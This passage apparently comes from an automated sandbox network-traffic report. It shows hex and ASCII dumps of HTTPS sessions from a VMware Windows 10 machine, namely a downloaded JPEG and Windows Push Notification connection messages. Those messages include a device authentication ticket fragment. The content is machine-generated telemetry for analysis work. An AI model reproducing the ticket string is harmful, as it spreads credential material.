                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC15530INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 00 da 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 00 00 00 00 60 00 00 00 01 00 00 00 60 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 34 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 35 3a 31 34 20 32 32 3a 32 38 3a 33 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 03 00 00 00 01 07 80 00 00 a0 03 00 03 00 00 00 01 04 38 00 00 00 00 00 00 00 00 ff db 00 43 00 04 02 03 03 03 02 04 03 03 03
                                                                                                                                                                                                                                                                            Data Ascii: JFIFHHExifMM*bj(1r2i``Adobe Photoshop 24.4 (Windows)2023:05:14 22:28:368C
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 69 50 c7 1f fa 1f ee 9b 3f bc 5f 97 77 ad 40 c9 3d dc 9e 52 2f 9b 27 2f b9 7d ab 53 4d 80 0b 7c df b3 34 5f c2 ab eb 5d 17 e5 5a 9b 68 b7 28 47 3d e5 a7 01 9b 6b 2e 17 f8 b6 83 da 98 c2 4b 88 f8 45 90 6e f9 95 5b e6 fc aa ee a1 2a 26 db 70 bb 55 b8 55 fb bb 4f f5 aa 39 8c f0 3f 75 2e ef 9a 45 fb d5 4b 54 54 6d 2d 46 37 9b 1f ee fe 5c 32 fd e5 f4 a7 5b a5 b8 99 5d f7 30 65 ff 00 be aa 7b 96 b7 59 a3 8e 06 69 07 f1 2b 7f 0f e3 49 25 bf 93 fc 4d ea ad fc 34 5c 2e 82 49 4a 46 c6 2f dd aa fd e5 5f bc d5 56 e5 66 9e 1d e2 26 60 ad f3 7f 7b 3e b5 2b 2c 97 12 65 df 6e df ee ff 00 4a 63 c5 70 6e 17 1b b1 1f fb 54 0d 5b 73 47 49 b4 3f 67 cc d0 47 22 c9 ff 00 3d 1b e6 6f c4 74 a8 bc 9d b7 93 c5 1a b2 85 fb aa ad fd 6a bb 4c 37 30 89 9a 35 65 3f 7b fa 52 da cd 23 b2
                                                                                                                                                                                                                                                                            Data Ascii: iP?_w@=R/'/}SM|4_]Zh(G=k.KEn[*&pUUO9?u.EKTTm-F7\2[]0e{Yi+I%M4\.IJF/_Vf&`{>+,enJcpnT[sGI?gG"=otjL705e?{R#
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 3c 09 f0 8a cb cb 58 3e 24 dc ea 77 12 fe ed 62 b2 d3 db ef 8e e7 8e 87 da b2 75 0d 07 e1 e5 be a9 26 99 71 a9 6a 8d 71 12 ef 8a 3f b2 6d f2 fb b2 3f 39 ff 00 0a 93 4d f8 51 f1 0e f1 a7 8c ea 6d 14 96 d8 f9 7c c3 f3 13 e8 70 3a 55 99 be 05 78 86 16 fb 45 de b8 be 76 e2 5b cb 62 ee a4 75 24 f5 a8 e7 8a fb 41 66 57 b1 d3 3e 1c 49 a7 b7 da f5 39 e2 8e 5b 9d 9e 6f d8 24 76 87 23 3f 7f 77 19 f4 c1 ad 56 d1 3e 0b db db c5 14 ba fd cc b2 ee f9 57 fb 2e 44 f3 33 d8 b6 73 ba a9 e8 9f 04 75 dd 5a de 79 63 d7 24 88 5b 49 8d ae a7 e6 27 db 35 24 9f 01 f5 c4 66 7b bf 11 ec ef b9 63 2e d9 fc e8 f6 90 ee 1c af 73 1f fb 27 c1 71 ea 1b f4 8d 7a 05 dc c5 3c b9 2d a4 87 83 d5 43 b0 20 36 38 e6 ae 5f 7c 3b f0 9d e5 8c 53 f8 73 5c bb 82 69 23 fd dc 17 6a 26 4d fd d5 99 39 1f
                                                                                                                                                                                                                                                                            Data Ascii: <X>$wbu&qjq?m?9MQm|p:UxEv[bu$AfW>I9[o$v#?wV>W.D3suZyc$[I'5$f{c.s'qz<-C 68_|;Ss\i#j&M9
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 19 b8 5b 6b bb f8 99 a3 b9 5c 2c 71 36 ef 2f d3 15 6b 45 8a e6 db 5a b9 d4 5f 77 95 e1 fb 43 72 8a bf 75 a4 7f 96 34 27 b9 dd e9 e9 5e ef 37 c2 9f 00 43 6a b2 5a 36 b1 e5 34 78 f2 7c cf 9b fe fa e9 5e 27 fb 42 5b e8 fe 12 d3 60 f0 b6 9d e7 c7 f6 a9 4d fd cc 93 cf b9 d9 23 1f 22 e7 eb 51 46 8b e7 57 37 54 cf 12 d2 e1 d5 3c 5d e3 08 c5 a3 49 3d f5 d5 da c7 e5 bf df de c7 9f c1 7b 9a fb 03 e1 a7 85 34 cf 0a e8 36 da 64 5f 29 55 fd fc 8d ff 00 2d 1f b9 3f 8d 78 37 ec cf 65 e7 eb 8b a8 98 36 c9 1c 60 34 ab f7 fc c2 72 c7 fe f9 e2 be 98 b5 80 3a ec 8d 59 b7 2f f1 56 d8 89 bb d8 ea 82 b8 d8 e3 ff 00 4c 67 8d be 58 bf bd 56 e4 85 5e 65 90 7c a7 9d cb 51 d8 c4 17 71 fe 26 c6 df ee d6 82 c2 17 71 fe 16 5a e4 b9 ad 88 6c 2c d3 ab ee f9 aa dd c5 b4 69 7d 17 cc cc bd
                                                                                                                                                                                                                                                                            Data Ascii: [k\,q6/kEZ_wCru4'^7CjZ64x|^'B[`M#"QFW7T<]I={46d_)U-?x7e6`4r:Y/VLgXV^e|Qq&qZl,i}
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: ad cb e7 47 be 59 fe c7 f6 a9 23 60 cc 92 7f 17 fb 5d 87 e1 59 7a e3 11 75 1e 59 a3 0c db db 77 f0 9f f6 4f bd 31 dd ec cc 49 bc c2 d2 09 17 6c ad ce d6 f9 59 6a 7b 51 72 d6 b2 5c 27 ee e3 db 8f 9b f4 e2 a6 7b 34 99 9a 67 9d 98 b6 3e 66 fd 46 7b d5 ab 33 a7 95 68 23 83 9e be 63 64 32 bf d3 a6 29 b9 0f 5b 94 ed 22 82 48 f7 cf f3 34 6c 3e 5f ba b5 6e dc 08 a3 c3 cf e6 c3 17 dd f3 32 bb 41 ea 00 ab 69 0c 6f 6f 93 fb b0 dc b7 97 8e b5 1b c7 6a 1a 3c 5c ac aa ac 3f 77 f7 57 db 15 37 b8 d2 92 d5 90 6f 77 56 f2 d1 7c b9 78 dd 1a fe a2 9f 6b 69 70 ec b6 d6 f1 35 cc bb b0 b0 ae 59 98 f6 c0 ab 16 ea 96 d7 cb 7f a9 c7 25 ad 8f 56 8f ee 3c d9 e3 e4 07 d7 f2 a9 2e 57 50 4b 1f 32 29 7f b0 ec 5a 43 fb c5 cb 5e 49 e9 c7 50 07 a8 e2 98 dc 8b 7a 3d 84 ba 5e a5 06 a9 af 6a
                                                                                                                                                                                                                                                                            Data Ascii: GY#`]YzuYwO1IlYj{Qr\'{4g>fF{3h#cd2)["H4l>_n2Aiooj<\?wW7owV|xkip5Y%V<.WPK2)ZC^IPz=^j
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 1f 8e 74 6f 0f ea 93 65 60 8e ce f3 68 db 73 07 c8 b3 7b b2 74 dd f4 ab 55 15 c5 cc 70 ba 26 bc f0 71 71 12 b9 db 8f 37 ee b6 3d 1b 1d 45 76 7a 0e b7 04 b6 ad 6c f1 79 90 b7 fa d8 24 6d e8 c3 d5 0f ad 70 3e 21 d0 75 1d 1e 66 37 10 2c 91 b7 0b 3c 7f 32 7f f5 bf 1a 93 c3 b7 12 59 34 6f 37 cb 6d bb e6 66 fb cb ee 29 ca 29 8f 47 a9 ad e2 dd 11 ec bf d2 ec ee da 5d 2e 5c 9f 2f 77 cd 6f fe cb 2f f5 ef 58 a8 c8 57 11 c0 d1 a7 f7 be f3 7d 4d 7a 76 9c 90 48 bf bf f2 19 6e 63 da ca ab 94 91 3d 7d 30 7d 2b 91 f1 7f 87 9f 40 be 57 8d 96 4b 39 d7 7c 4c ad f3 2f a8 f7 c7 d7 34 a3 2e 82 4e e8 c4 66 96 de 16 3f 78 2f dd 65 fe a0 d5 48 f3 24 de 64 8c ab bb fb d4 f9 88 96 4d a9 f3 2a fd d6 6f 95 5b 3e 9e 95 a5 a6 db c8 f1 e6 29 77 1f ee ab 07 ff 00 c7 7b fe b5 63 21 92 69
                                                                                                                                                                                                                                                                            Data Ascii: toe`hs{tUp&qq7=Evzly$mp>!uf7,<2Y4o7mf))G].\/wo/XW}MzvHnc=}0}+@WK9|L/4.Nf?x/eH$dM*o[>)w{c!i
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 96 56 9e 62 ee 4b 66 68 a1 e3 6b 7c aa de f5 cb 52 b5 b4 81 ac 61 d4 c0 f0 be 91 a7 e8 9a 6a db 69 56 6b 6b 1a a8 11 f9 6b b7 f3 ae 95 59 e3 86 34 91 5b d7 73 37 cc b5 6b ec 36 c2 df 60 f9 62 66 cb 47 26 59 94 8f 7f 4a 8e e2 dc 99 18 86 da bb be 55 db f2 d7 23 6d 9b 24 90 d4 12 2c 9c ed f9 b9 a9 72 0b 67 f0 fc 68 6b 51 16 dc b6 ed df d6 9d 75 6e ab 1f ee d9 b2 df 33 6d a9 e5 65 73 15 e4 96 34 dc 7c d6 69 3f bb ed 54 e1 f3 8d d7 dd fe 2f 99 9a 9f f6 6f 2e 4c f9 ec c7 ab 2f b5 4b e5 92 ac 3c d6 ca f3 f8 d5 32 48 e4 90 85 52 8b c3 37 cc bf dd a4 83 22 e3 01 39 6e 7e 6f bb 45 d1 41 1f cf 2b 7c ac 3e 6f ad 4a a1 12 48 dd 17 cc 8f fb df 4a 48 09 d5 a2 56 f7 fe 1a d2 b3 b9 1f 28 da d9 db f7 6a 95 e1 8f f7 6e 9b 54 b7 3b 55 7e ed 45 71 34 8d 1c 72 a4 bb 69 68 05
                                                                                                                                                                                                                                                                            Data Ascii: VbKfhk|RajiVkkkY4[s7k6`bfG&YJU#m$,rghkQun3mes4|i?T/o.L/K<2HR7"9n~oEA+|>oJHJHV(jnT;U~Eq4rih
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16067INData Raw: 00 f5 d7 d4 3a 96 97 a5 f8 83 c2 3a be 99 2c 51 ae a1 2d a3 08 e5 65 db b6 42 38 3f 8d 7c a9 27 9f 1a b5 b9 89 55 95 b6 49 b5 4a b7 1e b4 a9 c9 49 7a 09 1a 16 a9 60 d0 b3 06 fd e2 e3 e5 96 3f 95 bf 15 39 5f c8 d4 37 97 0b 27 ee d1 59 21 56 ce d6 f9 b7 1f 6c 60 1f ae 33 59 6c a6 29 14 9f bd d5 7f bb 53 48 f7 0e bf ea 95 4b 7f 12 b7 de 3e b8 ab b0 cd dd 2d ac a6 8d a3 8d a0 f3 7a ac 72 a8 55 6f a8 6f f1 06 a8 6a 53 cb 2c 98 95 76 ac 5c 2c 7e 61 95 57 fd d2 7a 0f 6a ce 8c cb 12 fc eb b8 7f 17 cd 52 c9 72 9f f2 c6 0f 2f e5 f9 9b cc f9 5a 9d 80 d5 d2 ee a2 8e 4d 9f 2f cd ce ee 55 fe a3 a6 7f 03 51 6e 17 17 5b e4 9d 76 ee fe 26 db bb fd e1 fd 71 59 96 b3 14 fe f4 a3 fb bb aa 7b 8b c9 3c bf dd 79 8b fd e6 93 e6 a0 0d e8 6c 53 ec ed 3a ca ad 1c 7c f9 b0 30 99 17
                                                                                                                                                                                                                                                                            Data Ascii: ::,Q-eB8?|'UIJIz`?9_7'Y!Vl`3Yl)SHK>-zrUoojS,v\,~aWzjRr/ZM/UQn[v&qY{<ylS:|0
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: 6f 5a f2 4f 0f eb 1a a7 88 7c 37 a0 a5 c5 ac f2 48 b6 cd 66 d7 bc bb 4c 50 60 86 5f f6 47 04 0e 6b ea ef 1a 59 a4 96 b9 da ac df ed 7a 77 af 19 f0 7e 83 65 a4 f8 a2 d7 48 9e 7f ec fb 08 fc 44 75 0b 0b 96 f9 56 19 25 4c 05 6e 9f 29 71 b6 ba a8 4f 4e 56 65 35 a9 e6 fa cd 95 a7 89 2c 6d 75 1b 89 da eb ec 79 b3 b9 8f 6e d5 d8 38 47 3d b2 be ff 00 8d 79 96 a1 e1 cd 71 35 ab a8 35 7f b3 45 2d a6 43 5c df ce 16 16 1d 94 6d c8 2c 54 f4 1c 57 da 1f 1d 3c 25 e1 7b 18 7f b5 8d 9f f6 51 9d 8a cf f6 45 0b 1f 9a 4e e0 64 4e e7 76 79 af 9c fe 38 68 f6 9e 22 d2 db 5e b7 89 63 d7 74 a9 0f f6 b4 5e 58 85 af 2d b2 15 2e 36 f7 61 dc 7a 56 aa 44 a3 a5 fd 99 fc 47 a4 69 7a 1a d9 dd df 41 3e a1 a6 b1 5b b9 ed bf e7 d1 8f ca 43 b6 37 6c 3d 40 af a0 74 19 ed ae 56 09 7f 76 cf 26
                                                                                                                                                                                                                                                                            Data Ascii: oZO|7HfLP`_GkYzw~eHDuV%Ln)qONVe5,muyn8G=yq55E-C\m,TW<%{QENdNvy8h"^ct^X-.6azVDGizA>[C7l=@tVv&
                                                                                                                                                                                                                                                                            2024-12-27 06:09:30 UTC16384INData Raw: c5 79 77 88 b4 5d 9a 94 b0 26 dc c1 83 12 b2 fc b2 0c fa 0c 1e 73 5e 91 e0 d8 6e 35 cd 6a 2d 60 ca b2 c5 a9 e9 f1 9f 97 3b 94 81 c8 fc ea a7 8b 7c 2f bf 50 6d 62 26 65 7b 35 f9 a3 db fe b2 36 18 eb ea 1a bb 23 65 a1 86 c7 ce f7 16 97 7e 72 a5 bd 9c 76 ab b8 ee 93 cf 2d fa b1 ed 5e dd fb 36 78 a9 07 82 6d b4 a7 bc 59 66 d2 6e e5 b5 8f f8 77 45 30 dc a8 0f fb c3 39 ed 5e 53 e3 cf 0f dc 69 be 2c bc fb 5a ad cc 2d 28 9a 39 24 90 bf c9 27 cc 30 a3 d3 38 a9 7c 01 7f a7 69 5e 20 96 c1 ee 56 01 aa c1 e5 c5 76 cb e5 a5 ac ea 77 45 9c 64 e0 b7 19 3d 29 b4 a4 ac 53 d5 1f 5c de 78 87 40 d3 bf e2 71 a8 6a 70 59 d8 6a b6 81 e4 f3 64 db e5 ca 83 6b 2f b9 2b 5c 5f 8a be 24 7c 3b d6 74 db cd 0e 49 ee e5 56 8c 99 20 81 77 7d b9 00 dd b5 31 cf 22 bc e6 e3 4e b8 f1 f7 81 ee
                                                                                                                                                                                                                                                                            Data Ascii: yw]&s^n5j-`;|/Pmb&e{56#e~rv-^6xmYfnwE09^Si,Z-(9$'08|i^ VvwEd=)S\x@qjpYjdk/+\_$|;tIV w}1"N


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            17192.168.2.64978920.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:38 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 37 4c 73 63 4f 5a 70 6c 37 30 69 48 2b 63 53 48 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 64 64 66 61 39 64 34 35 63 30 32 63 36 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: 7LscOZpl70iH+cSH.1Context: deddfa9d45c02c60
                                                                                                                                                                                                                                                                            2024-12-27 06:09:38 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:38 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 37 4c 73 63 4f 5a 70 6c 37 30 69 48 2b 63 53 48 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 64 64 66 61 39 64 34 35 63 30 32 63 36 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 7LscOZpl70iH+cSH.2Context: deddfa9d45c02c60<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:38 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 37 4c 73 63 4f 5a 70 6c 37 30 69 48 2b 63 53 48 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 65 64 64 66 61 39 64 34 35 63 30 32 63 36 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\QOS 56MS-CV: 7LscOZpl70iH+cSH.3Context: deddfa9d45c02c60
                                                                                                                                                                                                                                                                            2024-12-27 06:09:39 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:39 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 6b 36 32 78 48 2f 35 63 6b 36 61 33 57 65 70 37 69 31 59 6f 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: 1k62xH/5ck6a3Wep7i1YoA.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            18192.168.2.64981720.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:49 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 64 4b 6d 43 32 57 4e 72 79 55 75 4e 52 62 2b 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 39 63 32 30 62 35 31 34 62 32 31 39 35 34 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: dKmC2WNryUuNRb+Z.1Context: 729c20b514b21954
                                                                                                                                                                                                                                                                            2024-12-27 06:09:49 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:49 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 64 4b 6d 43 32 57 4e 72 79 55 75 4e 52 62 2b 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 39 63 32 30 62 35 31 34 62 32 31 39 35 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 59 50 45 35 38 7a 47 59 6f 4a 52 6f 61 35 57 55 43 75 55 6c 45 51 7a 53 6f 5a 51 4a 59 62 57 6a 7a 46 6d 4a 62 57 32 34 48 4a 6f 77 79 76 61 51 54 61 34 6c 67 34 75 6f 49 79 78 5a 6a 49 49 63 4d 74 6c 44 2f 64 61 4d 55 68 36 70 44 53 6c 72 6a 70 47 6f 41 34 4e 73 34 6f 4e 58 70 68 74 37 76 72 76 5a 74 45 36 6c 38 77 4e 6e
                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: dKmC2WNryUuNRb+Z.2Context: 729c20b514b21954<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARYPE58zGYoJRoa5WUCuUlEQzSoZQJYbWjzFmJbW24HJowyvaQTa4lg4uoIyxZjIIcMtlD/daMUh6pDSlrjpGoA4Ns4oNXpht7vrvZtE6l8wNn
                                                                                                                                                                                                                                                                            2024-12-27 06:09:49 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 64 4b 6d 43 32 57 4e 72 79 55 75 4e 52 62 2b 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 32 39 63 32 30 62 35 31 34 62 32 31 39 35 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: dKmC2WNryUuNRb+Z.3Context: 729c20b514b21954<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                            2024-12-27 06:09:49 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                            2024-12-27 06:09:49 UTC58INData Raw: 4d 53 2d 43 56 3a 20 76 45 5a 6b 33 42 36 79 2f 30 53 4b 50 6b 61 6b 6c 6f 31 50 42 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: vEZk3B6y/0SKPkaklo1PBA.0Payload parsing failed.


                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                            19192.168.2.64983720.198.118.190443
                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                            2024-12-27 06:09:58 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 79 7a 48 51 64 68 6e 63 39 45 43 41 71 6b 47 6b 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 62 65 39 39 34 34 66 37 62 65 38 63 62 34 65 62 0d 0a 0d 0a
                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: yzHQdhnc9ECAqkGk.1Context: be9944f7be8cb4eb
                                                                                                                                                                                                                                                                            2024-12-27 06:09:58 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
